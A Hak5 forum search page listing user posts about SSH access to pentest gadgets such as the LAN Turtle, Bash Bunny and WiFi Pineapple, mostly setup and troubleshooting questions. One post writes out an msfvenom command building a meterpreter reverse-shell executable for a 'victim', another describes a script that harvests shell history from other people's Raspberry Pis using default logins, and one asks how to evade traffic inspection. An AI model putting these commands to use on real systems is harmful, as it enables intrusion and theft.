Jump to content

Search the Community

Showing results for tags 'SSH'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. I run a VPN service to connect to the Internet. I can open my C2 instance OK and see my devices and stats OK. When I select a device, terminal, and try to open a SSH connection to the device I get the spinning circle icon and never get the SSH session established. Any suggestion on how to keep my VPN session and be able to open a SSH session from withing my C2 instance would be appreciated.
  2. Ok. So I have turned on remote router access to my own ISP-provided router at home (NowTV/sky router), where I have 2 laptops connected by WiFi, with a desktop on the ethernet. I have removed the firewall and lowered protection so I can have easier access. I have also turned on some services, namely FTP, IMAP, POP3, SSH, HTTP and some others - as advised by someone....not sure exactly why... What I now want to do is 'experiment' with what I can do from another location with remote access. For example - if I wanted to see the file systems on any pc/laptop - how would I go about it? Do I need to do an exploit or can I use SSH? How do I go about using FTP etc? These are just a couple of queations of many I can think, but it's somewhere to start. I'm still slightly confused about using the router and DCHP...I understand that the devices attached are given an internal IP (192.168.0.**) but I'm not sure how use access these IP's correctly from outside the LAN. How do I 'login' so to speak from a remote PC to my router and pivot to the desktop (if that's the right terminology)? As you can tell I'm quite new to this. So you know, I'm using Mint as my OS after ditching Windows, and also have Kali installed on a VM. I don't want step-by-step solutions - I fully understand the key to learning is to actually do things for myself, I just need a liitle guidance on where to go from now and what to do next (SSH, FTP etc). Can anyone help point me in the right direction?
  3. Heya! So, been setting up my devices in C2. Got all of them in there and I can see the Loot as well as other items like say the Pineapple Tetra's SSIDs and such. One thing I can't seem to do is SSH from C2 to any device. I was wondering if I'm missing something specific on my setup. I have even tried setting SNATs to the devices, though I knew that wouldn't have been a requirement nor really worked... But I went that far as I just couldn't figure it out. It would really help me if I can get this sorted as I have a Pen Test coming up and I'm foreseeing the need to drop some of the devices on site. A work around is dropping a Raspberry Pi or something with them, but it does add an additional device. Thoughts?
  4. Hello everyone I want to connect via ssh to my wifi pineapple nano without a password and i'v been following this tutorial but i get an error. Can someone help me by letting me know if it's possible. And if it's possible, can someone help me with the command line and where should i put my public key in the sd of the pineapple. Thanks for your help
  5. I got my LAN turtle a while back and everything was fine out of the box, I could update and do all the things. It's been a couple of months and when I plugged my LAN turtle back in I don't get an option in my wifi to connect to its ethernet connection and thus my SSH times out whenever I try to connect to 172.16.84.1 I also can't do a firmware update because I can't connect to the turtle's connection in order to go to 192.168.1.1 Please help, I don't want to buy another one.
  6. Is there a certain encryption algorithm that i should use when creating an ssh key pair that will bypass network-based inline traffic inspectors (eg CryptoAuditor). Maybe im using the wrong one (ssh-keygen -t rsa -b 4096) and i'll get pulled up? Any info on how these bits of kit makes me visible and how to bypass them will be greatly appreciated.
  7. This was not my original script, it was created for OpenWRT operating systems, but it did not work on the Tetra by default. I simply made a fork and modified it for anyone who would like to switch to Oh My ZSH as their default SSH terminal vs busybox(ash). I know I wanted to ?! Here is the quick copy and paste script: opkg update && opkg install ca-certificates zsh curl git-http sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)" sed -i -- 's:/bin/ash:/bin/zsh:g' /etc/passwd #reboot Or view below.. Gist Code PS: I do not own any other Pineapple models, so I can not tell you if it works for others.
  8. Hello forum, I'm trying to create an ssh tunnel between my turtle and my ssh server (which I configured properly to avoid to buy a specific vps), so following the tutorial video... https://www.youtube.com/watch?v=uIdvvrDrRj0 instead to buy a vps I configured my own ssh server on parrot security os , also setting options with no-ip and ssh port it's 1986 already port forwarded on my router... So if I try to connect to my own "vps" using ssh from another terminal, connection works properly but also turtle seems to connect to my server , however autossh connection does not work I'll show you my configurations screens below (with comments)... p.s I added user called turtle to connect my turtle to my server ... what doesn't work is when I try to : ssh root@localhost -p 2222 from another terminal to connect to my lan turtle. screens: generating my keys (I repeat that I'm using te port 1986 because already port forwarded and it works , so it isn't the problem): https://imgur.com/sJ2tUBC as you can see my ssh server works properly... let's configure lan turtle... https://imgur.com/EpzLOuL i set host port and user that works as shown above https://imgur.com/7rtAQa7 These are the generated keys on server so I copied them with copy_key always in auto ssh configuration (are double because I generated them 2 times in order to test) https://imgur.com/pUj6eQv At least the ssh auto configuration (should be these based on my configurations but I don't understand if I save in a second moment appears strage characters like ' in "Port") https://imgur.com/UoKmcRP From another terminal I should be able to connect to lan turtle connecting to turtle ssh account and than on root@localhost but 2222 port seems not working and if I try for 1986 it appears root of ssh server and not of lan turtle..no turtle shell appears and no connection is successfully established.... I repeat that connection between lan turtle and my open ssh server seems work, anyway there is something wrong.... Is maybe because I have to configure some advanced options in the ssh linux server file (/etc/ssh/ssh_config) ? Help me , let me understand what is going wrong guys, thank you.
  9. For a larger project, I am exploring the use of Powershell to automate network tasks. In the enclosed script, I am assuming someone has a Raspberry Pi named PiM3.local with default username and password on my local network. I use Posh-SSH which can be installed within Powershell by Install-Module Posh-SSH . I then execute a command with SSH, grab the .bash-history and put a new file in the Pi. One could, of course, use nmap to find computers with port 22 and then proceed with something like this to see what happens. One could of course use the wifi pineapple to ... and so on. Are there loose pi's where you live? RaspberySFTP.ps1
  10. Hey guys is there a way to use the tools on the Nano over ssh? When I try to use reaver for example this is the output I get: root@Pineapple:~# opkg install reaver --dest sd Package reaver (1.6.3-1) installed in sd is up to date. root@Pineapple:~# reaver -ash: reaver: not found root@Pineapple:~# I also tried to cd to the sd directory and obtained the same result: root@Pineapple:/sd# opkg install reaver --dest sd Package reaver (1.6.3-1) installed in sd is up to date. root@Pineapple:/sd# reaver -ash: reaver: not found root@Pineapple:/sd# Any help would be greatly appreciated :).
  11. My kali machine is in a LAN, in order to get a reverse connection from the victim outside the LAN, I set up a remote ssh tunnel ssh -N -R 45679:localhost:45679 user@aaa.aaa.aaa.aaa -p 45678 The ssh server is also inside another LAN, but port forwarding is possible, so I forwarded 45678 as ssh port, and 45679 as the reverse connection port. Tested with netcat, and apache server, worked. Now, here is the configuration of the malware generated by msfvenom msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=aaa.aaa.aaa.aaa LPORT=45679 -f exe -o mal.exe And here is the multi/handler configuration under msf msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.0.102 yes The listen address LPORT 45679 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target Then I exploit, nothing happens on the handler, no session receive, but the ssh terminal continuously showing the following message once I run the malware on the victim machine connect_to localhost port 45679: failed. connect_to localhost port 45679: failed. connect_to localhost port 45679: failed. I did a scan on aaa.aaa.aaa.aaa:45679, no open port discovered. Since NC and apache test works, SSH tunnel should be functioning properly, so it is the handler's problem? My thought is, the multi handler is somehow not listening/connecting to the tunneled port, but I am not sure how could that happen, doesn't remote ssh tunnel automatically apply to global once the command is running? Any ideas, or workarounds? This should be a FAQ, yet, couldn't find right way... Thank you
  12. Hello all. I have been watching the LAN Turtle 104 - Persistent Shell Access with AutoSSH video at https://www.youtube.com/watch?v=uIdvvrDrRj0 and at 5:15 it shows three fields for the setup, they are User@host, Remote Port & Local port. On my Turtle, which is probably a newer version of firmware than the one in the video, there is a fourth field simply named Port. As I understand it the Turtles local port is 22. It connects to the host via port 2222. Therefore on the host if you SSH to port 2222 it connects to the Turtle on it's port 22 through the 2222 tunnel. So you need a local port (22) and remote port (2222) to make this work, as shown in the demo video above. What is this extra field named 'Port' that I have, and what should it be set too? I entered 22 for this port and it all works. Just not clear what it's purpose is. Many thanks for any help. Tim
  13. I received my new squirrel. Did succesfully update firmware to v1.1, did also succesful packet capture in tcpdump mode with USB disk. But i cannot ssh into the squirrel. I connected computer to the Ethernet In Port of the squirrel (that one near USB port), computer gets IPv4 address via dhcp from squirrel (172.16.32.259). I can ping the squirrel on 172.16.32.1, but ssh does not open a console (using putty.exe on a Windows computer). Am i too dumb?
  14. I have just done the first setup of my LAN turtle following the instructions provided in YouTube video. I then went to ssh into my LAN turtle. I am 99% percent sure the password I typed is correct. but I get Permission denied (publickey, password, keyboard-interactive). I have never seen the keyboard-interactive part before. Can I access my LAN turtle without removing the screws under the sticker as this reuins the look? Thankyou luke-spademan
  15. Hello just received my Packet Squirrel and was trying to use putty to set it up, but unfortunately I could not find a com port assigned from my device or task manager. Running windows 7 and thought it to be minor error, anyone know of another way to obtain the port number?
  16. I'm hoping someone can help with this. I would like to setup a script that once my nano is connected to the internet to have it create an SSH tunnel to my existing SSH server. I would like all traffic to go through the SSH tunnel back to my server. I sometimes use my pineapple on open networks. The other reason i would like to do this is my tv provider has an app that lets me watch tv on my phobe but you have to be on your home network to view it. I have setup openvpn access server to try to accomplish this outside of my network bit somehow the software detects that and does t let me view live tv. I found an app on my android that creates a VPN SSH tunnel back to my SSH server and now I can view live tv outside of my network. So I would like to create a script to help with this This is for taking the time to read this. Any help would be great. Mark
  17. When running the following payload: LED G ATTACKMODE RNDIS_ETHERNET And try to SSH into the bunny (172.16.64.10) with Putty. As root I always get 'Access Denied' I've change the default password using attackmode serial but that password is not working for SSH. I even set it back to the default hak5bunny password, but still no joy. What am I missing here?
  18. Hello I am thinking of buying a smash rabbit and I want to find out a way to ssh into it. I heard that if I want to SSH into the rabbit I have to "waste" a payload for the bunny to emulate RNIDS_ETHER. Is this correct? Or is there some other way for it to emulate a usb-to-ethernet adapter upon boot without having to use a payload? I dunno, stick something in the .profile? Thanks!
  19. Hi, if I install avahi-daemon and put ATTACKMODE RNIDS_ETHER in something like .bashrc or .profile, can I SSH into the bunny with sudo ssh root@bunny.local? I greatly prefer SSH over serial so I would really like my method above to work. I don't own a bash bunny, although I might buy it at some point, I'm just considering. Thanks!
  20. So I received my Wifi Pineapple NANO a few days ago and it worked fine on first try, I got on to the web interface and reached the point of updating the firmware and I think I may have messed up. Now whenever I plug the nano in, the light flashes twice holds for about 5 seconds then turns off, I can't ssh to it, I can't get the web interface and I can't see it as a wifi network. Any advice?
  21. Hey all, I'm new, had the LAN turtle for about three weeks and I'm loving it. I have limited knowledge of the RF spectrum and I'm new to networks etc, but I've learnt so much by solving problems as I've gone along. However one thing I'm stuck with is setting up an SSH tunnel to the turtle remotely, in order to get a more diverse capture than I believe URLsnarf is capable of. Current setup Windows 10 putty (and/or Kali in Vbox) SSH to a digitalocean VPS SSH into my turtle remotely. I've searched the forums and googled for "wireshark remote ssh capture" etc, but everything I find seems either irrelevant or goes way over my head. From what I did understand it seems like I may not be able to do it. And I figured if it was possible, wouldn't everyone be using Wireshark instead of URLSnarf (which seems basic to me) Questions Do any of you gurus know if it is possible to get a relatively comprehensive live capture from the LAN turtle via SSH? Has anyone done this yet?
  22. ===========================SOLUTION============================== Generate the following payload without STORAGE in the attackmode. #!/bin/bash LED G ATTACKMODE ECM_ETHERNET Thanks to Fang_Shadow, I've learned that using storage in concert ECM_ETHERNET prevents the system from pulling an IP (for what reason I still don't understand - I'm guessing it's just a bug). I have had some issues with SSH but according to ifconfig (on local system) I see the interface is up and nmap scans show port 22 is open on the new IP, I'll update this post if anything changes. =================================================================== Endgoal: I want to ssh from host machine into my BashBunny, then pivot from my BashBunny to a remote cloud hosted webserver, and write a testfile to that server. Host System Used: Debian Linux Crux: I am unable to acquire an ip address for my BashBunny using bb.sh Attempts: 1. I tried to perform these actions from Arming Mode using the serial connection, however I learned that I am not able to share my network connection from serial mode and that Arming Mode only allows: Serial and Storage 2. I attempted to run the default payload in order to gain network connectivity: #!/bin/bash LED G ATTACKMODE ECM_ETHERNET STORAGE My understanding of this code is that it will indicate it is ready when there is a solid green light (LED G) and that it will facilitate Ethernet connectivity and Storage (Last line), it is also my understanding that this initializes a new network interface that can be seen with the commands "ip addr" or "ifconfig -a". However this new interface does not appear to be configured yet and attempting to run the command ssh root@172.16.64.1 does not result in the expected login prompt and eventually times out. 3. I've also attempted to run the bb.sh in order to share my hosts network connection, despite not being able to ssh into 172.16.64.1 IP. The script appears to work until you attempt to connect with it, and then it just hangs. Any ideas on how to ssh into the BashBunny? Thanks, Jay
  23. I am unable to SCP or SSH to the mark V. Getting "permission denied" error for both. This has been constant prior to today; however, today when minimizing infusions they will no longer maximize again and I cannot factory reset or even properly reboot the device. So I need to be able to reflash it over SSH. Any ideas? Am I overlooking something here? Using port 22 for both.
  24. I want to automate an SSH login. I was looking at sshpass or expect. But I haven't been able to find a working example of either. Anyboy use either of these? Also something of note. I don't know the hostname of the remote machine yet. I'm trying to get that in an automated way as well. I've tried raceroute, smbclient, nslookup, host, arp, and finger. Expect needs to expect user@host before it can send any commands over SSH but I don't know the hostname at this point.
  25. I am a complete noob at this, so I could be doing something completely wrong. Just got the Lan turtle today. Plugged it in with a phone charger meeting minimium power requirements and connected it to a PC with an OTG ethernet-to-USB adapter. Had to setup the network connection manually (on Ubuntu 16.10) with: IP - 172.16.84.1, Netmask - 255.255.255.0, Gateway - 192.168.1.1, DNS Servers - 208.67.222.222 and 208.67.220.220. After that, I check the connection with ifconfig and everything appears to be OK, so I finally tried connecting to the Lan Turtle. :$ ssh root@172.16.84.1 Permission denied (publickey). I have setup openssh on a few of my PCs for ssh-key authentication only, but this the first time using the Lan Turtle. Also realised I cannot browse on the internet while it is connected, even with wifi and another wired connection available. I have searched around to see if there is a fix for this, but I canot find anything.
×
×
  • Create New...